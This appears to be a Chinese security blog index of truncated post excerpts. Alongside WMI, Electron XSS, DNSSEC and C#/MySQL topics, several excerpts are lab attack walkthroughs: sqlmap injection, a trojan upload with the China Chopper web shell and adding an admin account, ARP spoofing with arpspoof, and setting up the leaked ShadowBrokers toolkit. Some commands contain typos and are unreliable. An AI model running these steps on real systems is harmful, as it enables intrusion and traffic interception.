WMI 的攻击,防御与取证分析技术之攻击篇

近日,FireEye 安全公司的高级逆向工程团队(FLARE)发布了一份标题为《 WMI 攻击,防御与取证分析技术 》的 PDF 文档,该文档页数多达 90 页,文档内容主要从攻击,防御和取证分析这三个角度分篇对 WMI 技术做了详细的描述。其中不乏有很多值得学习思考的地方。于是,我利用业余时间翻译整理了此文档,拿出来与大家共分享 :),如有纰漏,望各位不吝赐教。

为了对原文档内容进行全面的翻译和解读,我按照文章的分析角度对原文档进行了分段式的翻译,本篇文章是分段式里面的第一篇,其余两篇译文的标题分别为:

  • 《 WMI 的攻击,防御与取证分析技术之防御篇 》
  • 《 WMI 的[……]

Read more

Electron hack —— 跨平台 XSS

基于 Electron 的 XSS 攻击实例,远比你想象的简单。

什么是 Electron

也许你从未听说过跨平台 XSS,也从未听说过 Electron, 但你肯定知道 GitHub,或者使用过著名的 Atom 编辑器, 比如正在尝试翻译这篇文章的笔者,正在使用 Atom 来编写 Markdown。 Electron 优秀的跨平台特性,是本文的基础。
简单来说,Electron 是一个框架,用于方便开发者创建跨平台应用。 开发者可以通过它来使用 HTML + JavaScript 来开发桌面应用。 Electron 的用户非常广泛,因为它确实可以为不同平台提供同样的体验。

与传统观念的[……]

Read more

用 BIND 搭建高可用性 DNSSEC Hidden Master Server

用 BIND 搭建高可用性 DNSSEC Hidden Master Server
原文作者 Trusty Wolf 首发于 https://v2ex.com/t/266750

1. 关于 DNSSEC

关于 DNSSEC 的背景、目的和原理,强烈建议大家先阅读清华大学段海新老师的这篇文章,讲解的非常好,只是由于年代原因,其中 BIND 配置的章节已经过时,关于配置部分请大家参考下文。

简而言之,DNSSEC 通过数字签名的方法得以让用户验证 DNS 解析结果的真实性和完整性,但并不提供对 DNS 信息的加密,也就是说,在网络上传输的 DNS 信息依然是明文的,但是经过了可靠的签名。个人[……]

Read more

第一次网络实战

第一次网络实战

如何扫描sql注入请看:https://karliy.com/2017/05/mysql%E6%B3%A8%E5%85%A5%E5%AD%A6%E4%B9%A0/
在命令行中打开sqlmap找到漏洞网址输入:
python sqlmap.py -u “http://192.168.1.240/channel.php?id=3” -p “id” –dbs

进入网站的后台管理系统(我们可以在扫描器中找到这个路径)

上传本地木马

打开菜刀

进入命令行添加用户
net user abcqwe 123 /add

加入管理员组
net localgroup Admini[……]

Read more

ARP欺骗

ARP欺骗

需要XP和 KAIL-LINUX系统
打开XP的命令行输入ipconfig查看ip地址和网关

查看kali-linux的ip地址输入ifconfig查看MAC地址

在输入arp -a查看网关原本的MAC地址

在kail linux中输入arpspoof -i eth0 -t 192.168.1.189 192.1.1 实行ARP欺骗

回去XP查看自己网关的IP地址有没有变化

回去kail-linux输入 ehco 1 > /proc/sus/net/ipv4/ip_forward
这是一个帮你中转数据的指令

打开Wireshark,

然后当对方上网的时候我们就[……]

Read more

目标主机攻击

如何入侵目标主机

第一步通过虚拟机安装XP系统
在XP系统下安装3个软件(注意:需要按照顺序安装)
jdk-8u131-windows-i586.exe
安装jdk的时候会有警报不要管他继续安装
python-2.6.6.msi
注意:python的安装要配环境变量)

pywin32-221.win32-py2.6.exe
shadowbroker-master.zip解压到C盘根目录
解压完成后进入C:\shadowbroker-master\windows
右键点击打开方式选择文本或者写字版打开,替换文件路径

替换成下图这样

然后再C:\shadowbroker-master\w[……]

Read more

MYSQL注入

MYSQL注入

sql注入原理
SQL攻击(英语:SQL injection),简称注入攻击,是发生于应用程序之数据库层的安全漏洞。简而言之,是在输入的字符串之中注入SQL指令,在设计不良的程序当中忽略了检查,那么这些注入进去的指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破坏或是入侵。

下面我们来实践一下
完成mysql注入需要的工具:
sqlmapproject-sqlmap-1.1.5-12-g071132c
shell中国菜刀
python-2.7.13
navicatformysql
mysql-installer-community-5.6.35.0
Acun[……]

Read more

C#实现学生管理系统(三)- MySQL版

1.利用MySQL数据库将学生数据进行数据存储,所有数据都存放到MySQL数据库中。
2.实现MySQL数据库增删改操作学生信息。

MySQL演示数据

create database game CHARACTER SET utf8 COLLATE utf8_general_ci;
USE game;
create table student(
id int NOT NULL AUTO_INCREMENT,
number VARCHAR(255) NOT NULL,
name VARCHAR(255) NOT NULL,
age INT NOT NULL,
sex VARCHAR(255)[......]

Read more

C#连接MySQL

添加MySQL外部类库

MySqlConnection类负责连接MySQL
MySqlCommand类负责执行MySQL语句
MySqlDataReader类负责处理执行完MySQL语句返回的数据

MySQL演示数据

create database game CHARACTER SET utf8 COLLATE utf8_general_ci;
USE game;
create table student(
id int NOT NULL AUTO_INCREMENT,
number VARCHAR(255) NOT NULL,
name VARCHAR(255) NOT NULL,[......]

Read more